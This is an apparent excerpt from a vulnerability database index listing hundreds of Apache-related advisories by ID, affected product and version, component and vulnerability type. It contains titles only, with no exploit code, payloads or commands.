| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
| [82076] Apache Ranger up to 0.5.1 privilege escalation
| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
| [79791] Cisco Products Apache Commons Collections Library privilege escalation
| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
| [78989] Apache Ambari up to 2.1.1 Open Redirect
| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
| [78987] Apache Ambari up to 2.0.x cross site scripting
| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
| [77406] Apache Flex BlazeDS AMF Message XML External Entity
| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
| [76567] Apache Struts 2.3.20 unknown vulnerability
| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
| [74793] Apache Tomcat File Upload denial of service
| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
| [74468] Apache Batik up to 1.6 denial of service
| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
| [74174] Apache WSS4J up to 2.0.0 privilege escalation
| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
| [73731] Apache XML Security unknown vulnerability
| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
| [73593] Apache Traffic Server up to 5.1.0 denial of service
| [73511] Apache POI up to 3.10 Deadlock denial of service
| [73510] Apache Solr up to 4.3.0 cross site scripting
| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
| [73173] Apache CloudStack Stack-Based unknown vulnerability
| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
| [72890] Apache Qpid 0.30 unknown vulnerability
| [72887] Apache Hive 0.13.0 File Permission privilege escalation
| [72878] Apache Cordova 3.5.0 cross site request forgery
| [72877] Apache Cordova 3.5.0 cross site request forgery
| [72876] Apache Cordova 3.5.0 cross site request forgery
| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
| [71629] Apache Axis2/C spoofing
| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
| [66739] Apache Camel up to 2.12.2 unknown vulnerability
| [66738] Apache Camel up to 2.12.2 unknown vulnerability
| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
| [66695] Apache CouchDB up to 1.2.0 cross site scripting
| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
| [66356] Apache Wicket up to 6.8.0 information disclosure
| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
9965| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
9966| [65668] Apache Solr 4.0.0 Updater denial of service
9967| [65665] Apache Solr up to 4.3.0 denial of service
9968| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
9969| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
9970| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
9971| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
9972| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
9973| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
9974| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
9975| [65410] Apache Struts 2.3.15.3 cross site scripting
9976| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
9977| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
9978| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
9979| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
9980| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
9981| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
9982| [65340] Apache Shindig 2.5.0 information disclosure
9983| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
9984| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
9985| [10826] Apache Struts 2 File privilege escalation
9986| [65204] Apache Camel up to 2.10.1 unknown vulnerability
9987| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
9988| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
9989| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
9990| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
9991| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
9992| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
9993| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
9994| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
9995| [64722] Apache XML Security for C++ Heap-based memory corruption
9996| [64719] Apache XML Security for C++ Heap-based memory corruption
9997| [64718] Apache XML Security for C++ verify denial of service
9998| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
9999| [64716] Apache XML Security for C++ spoofing
10000| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
10001| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
10002| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
10003| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
10004| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
10005| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
10006| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
10007| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
10008| [64485] Apache Struts up to 2.2.3.0 privilege escalation
10009| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
10010| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
10011| [64467] Apache Geronimo 3.0 memory corruption
10012| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
10013| [64457] Apache Struts up to 2.2.3.0 cross site scripting
10014| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
10015| [9184] Apache Qpid up to 0.20 SSL misconfiguration
10016| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
10017| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
10018| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
10019| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
10020| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
10021| [8873] Apache Struts 2.3.14 privilege escalation
10022| [8872] Apache Struts 2.3.14 privilege escalation
10023| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
10024| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
10025| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
10026| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
10027| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
10028| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
10029| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
10030| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
10031| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
10032| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
10033| [64006] Apache ActiveMQ up to 5.7.0 denial of service
10034| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
10035| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
10036| [8427] Apache Tomcat Session Transaction weak authentication
10037| [63960] Apache Maven 3.0.4 Default Configuration spoofing
10038| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
10039| [63750] Apache qpid up to 0.20 checkAvailable denial of service
10040| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
10041| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
10042| [63747] Apache Rave up to 0.20 User Account information disclosure
10043| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
10044| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
10045| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
10046| [7687] Apache CXF up to 2.7.2 Token weak authentication
10047| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
